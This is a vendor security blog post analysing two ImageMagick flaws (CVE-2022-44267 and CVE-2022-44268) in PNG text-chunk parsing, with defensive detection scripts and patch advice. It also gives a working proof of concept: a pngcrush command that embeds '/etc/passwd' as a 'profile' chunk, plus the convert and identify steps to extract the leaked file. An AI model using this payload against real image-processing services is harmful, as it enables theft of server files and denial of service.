DoS and Information Disclosure Vulnerability in ImageMagick

By Rakeshanandyou, Keysight ATI
Apr 4, 2023

ImageMagick is a free, open-source software suite used for editing and manipulating digital images. It is widely used in industries such as web development, graphic design, and video editing, as well as in scientific research, medical imaging, and astronomy.

Recently, security researchers found two flaws in the open-source ImageMagick software [1] that lead to denial of service (DoS) and information disclosure. The issues were identified by the Latin American cybersecurity firm Metabase Q [2] in version 7.1.0-49 and were addressed in ImageMagick version 7.1.0-52, released in November 2022.

In this blog we will discuss these vulnerabilities in detail. Both originate from a logic flaw in ImageMagick’s parser for the PNG “text chunk”. A text chunk is a chunk of metadata that stores textual information related to the image; it consists of a keyword and a text string. If the keyword is “profile”, ImageMagick treats the text string as a filename and loads that file’s content as a raw profile.

The diagram below shows the layout of a text chunk in a PNG file.

CVE-2022-44267: Denial of Service

If the text string of such a chunk is “-” (a single dash), ImageMagick reads the profile content from standard input and the process is left waiting forever. This is a denial-of-service condition that can prevent ImageMagick from processing other images [3].

CVE-2022-44268: Arbitrary File Read

When ImageMagick parses such a PNG file, the resulting image can end up embedding the content of an arbitrary file from the server (provided the ImageMagick process has permission to read it).

Instead of the dash used in the previous vulnerability, if the text string is the path of a readable file on the system, such as “/etc/passwd”, ImageMagick reads that file’s contents and embeds them in the resulting PNG [4].
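To detect PNG files of the shape described above before they reach an image pipeline, the following Python script (an added example, not code from the original post or from ImageMagick) walks a PNG’s chunk list and reports every tEXt/zTXt/iTXt chunk whose keyword is “profile”. The sample PNG is constructed inline; checking all three text chunk types and comparing the keyword case-insensitively are conservative assumptions, not statements about ImageMagick’s exact matching.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNK_TYPES = {b"tEXt", b"zTXt", b"iTXt"}

def iter_chunks(data: bytes):
    """Yield (chunk type, payload) for every chunk in a PNG byte string."""
    assert data.startswith(PNG_SIGNATURE), "not a PNG file"
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4-byte length + 4-byte type + data + 4-byte CRC

def text_chunk_pair(ctype: bytes, payload: bytes):
    """Return (keyword, text) for a tEXt/zTXt/iTXt chunk, None for other chunks."""
    if ctype not in TEXT_CHUNK_TYPES:
        return None
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":
        text = rest
    elif ctype == b"zTXt":
        text = zlib.decompress(rest[1:])  # rest[0] is the compression method
    else:  # iTXt: compression flag, method, language tag, translated keyword, text
        compressed = rest[0] == 1
        _lang, _, rest = rest[2:].partition(b"\x00")
        _translated, _, text = rest.partition(b"\x00")
        if compressed:
            text = zlib.decompress(text)
    return keyword.decode("latin-1"), text.decode("utf-8", "replace")

def find_profile_text_chunks(data: bytes):
    """Text of every text chunk keyed 'profile' (compared case-insensitively as a
    conservative choice): a vulnerable ImageMagick treats it as a filename to load."""
    pairs = [text_chunk_pair(c, p) for c, p in iter_chunks(data)]
    return [text for key, text in filter(None, pairs) if key.lower() == "profile"]

def make_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk with its CRC (used only to construct the sample below)."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

# Constructed sample: a PNG skeleton (IHDR, text chunks, IEND), enough to walk the chunks.
SAMPLE_PNG = PNG_SIGNATURE + b"".join(make_chunk(t, p) for t, p in [
    (b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)),
    (b"tEXt", b"Comment\x00harmless"), (b"tEXt", b"profile\x00/etc/passwd"),
    (b"IEND", b"")])
```

Run `find_profile_text_chunks(open(path, "rb").read())` on an uploaded file; a non-empty result is a file that should be rejected or quarantined on an unpatched host.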

Attack in action

Publicly available proofs of concept exist for these vulnerabilities; let’s try them out.

Configuring the target

  1. Install a vulnerable ImageMagick version (prior to 7.1.0-52) on a Linux system from source [5].
  2. Clone the source repository.
  3. Install the delegate libraries for JPEG and PNG.
  4. Configure and compile ImageMagick.
  5. If ImageMagick configured and compiled without complaint, install it on the system. Administrator privileges are required to install.
  6. Configure the dynamic linker run-time bindings.

All of the above steps can be done using the following commands:

git clone https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.0
sudo apt install libjpeg-dev libpng-dev
cd ImageMagick-7.1.0
./configure && make
sudo make install
sudo ldconfig /usr/local/lib

Finally, we can verify that ImageMagick installed properly by converting any image:

/usr/local/bin/convert logo: logo.gif

Preparing the Malicious payload

  1. Install pngcrush and the other tools (pngcrush will be used to add a text chunk to the PNG file) using the following command:

sudo apt-get install pngcrush exiftool exiv2 -y

  2. Now we can add a text chunk to any PNG image using pngcrush and make it malicious. Each text chunk contains a keyword and a text string. For the keyword we provide “profile” and for the text string we provide the filename to read, for example /etc/passwd.

Use the following command:

pngcrush -text a "profile" "/etc/passwd" input.png poc.png

  3. Similarly, to create the payload for the denial-of-service attack, we use “-” as the text string and “profile” as the keyword in the text chunk.

Executing the Payload

To trigger the vulnerability, we use the following command:

convert poc.png output.png

The ‘convert’ command is provided by ImageMagick for manipulation of images. The poc.png contains a stored payload in a text chunk to read the contents of the file /etc/passwd. After executing the command, the contents of /etc/passwd file of the host machine will be embedded in output.png.

The file’s contents can be seen by running the following command:

identify -verbose output.png

The raw profile is printed as hex bytes; converting them back into ASCII gives the contents of /etc/passwd.
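When triaging images produced by a conversion service, it helps to automate that hex-to-bytes step. The following Python snippet is an added example (not from the original post) that parses the “Raw profile type” blocks printed by identify -verbose and decodes them; the sample output is constructed, and the assumed block layout (header line, blank line, byte count, then lines of hex digits) is an assumption about identify’s output rather than a documented format.

```python
import re
import textwrap

HEADER_RE = re.compile(r"^\s*Raw profile type (\S+):\s*$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
PASSWD_LINE_RE = re.compile(rb"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*$")

def extract_raw_profiles(identify_output: str) -> dict:
    """Decode every 'Raw profile type <name>:' block into {name: bytes}. Assumed layout:
    header, blank line, byte count, hex lines; a block ends at the first non-hex line."""
    profiles = {}
    lines = identify_output.splitlines()
    i = 0
    while i < len(lines):
        match = HEADER_RE.match(lines[i])
        i += 1
        if not match:
            continue
        while i < len(lines) and not lines[i].strip():  # skip the blank line(s)
            i += 1
        if i >= len(lines):
            break
        expected = int(lines[i].strip())  # byte count printed before the hex dump
        i += 1
        hex_digits = []
        while i < len(lines) and HEX_RE.match(lines[i].strip()):
            hex_digits.append(lines[i].strip())
            i += 1
        data = bytes.fromhex("".join(hex_digits))
        if len(data) != expected:
            raise ValueError(f"{match.group(1)}: expected {expected} bytes, got {len(data)}")
        profiles[match.group(1)] = data
    return profiles

def passwd_like_lines(profile: bytes):
    """Lines of a decoded profile shaped like /etc/passwd entries (7 colon-separated fields)."""
    return [ln for ln in profile.splitlines() if PASSWD_LINE_RE.match(ln)]

# Constructed sample of the relevant part of `identify -verbose output.png`; the embedded
# data is a single passwd-style line made up for the example, not a real system file.
LEAKED = b"root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_IDENTIFY_OUTPUT = "\n".join([
    "  Properties:",
    "    date:create: 2023-04-04T00:00:00+00:00",
    "    Raw profile type profile:",
    "",
    f"      {len(LEAKED)}",
    *textwrap.wrap(LEAKED.hex(), 72),  # assumed: hex printed 36 bytes per line
    "  Artifacts:",
    "    filename: output.png",
])
```

A non-empty result from `passwd_like_lines` on any decoded profile is a quick indicator that a converted image carries file contents it should not.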

In the denial-of-service case, ImageMagick tries to read the profile content from standard input, potentially leaving the process waiting forever.

Mitigation

To mitigate this attack, make sure to apply the vendor-supplied patch [6]. You can also use Keysight test platforms with an ATI subscription to safeguard your network against such attacks. Keysight Threat Simulator or BreakingPoint products can help you assess your network security controls and determine whether you are protected before the patch is applied. This kind of assessment is valuable because it tells you whether you have protection during the time before a change management window opens.

Leverage subscription service to stay ahead of attacks

Keysight’s Application and Threat Intelligence (ATI) Subscription provides daily malware and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Center continuously monitors threats as they appear in the wild and has just released a strike for this CVE as part of BreakingPoint System’s recent update 2023-04. More information is available at [7].

The following image shows screenshots of the two CVEs as strikes in BreakingPoint System:

References

[1] https://imagemagick.org

[2] https://www.metabaseq.com/imagemagick-zero-days

[3] https://nvd.nist.gov/vuln/detail/CVE-2022-44267

[4] https://nvd.nist.gov/vuln/detail/CVE-2022-44268

[5] https://imagemagick.org/script/install-source.php

[6] https://www.debian.org/security/2023/dsa-5347

[7] https://support.ixiacom.com/version/breakingpoint-strikepacks-os-v830-0
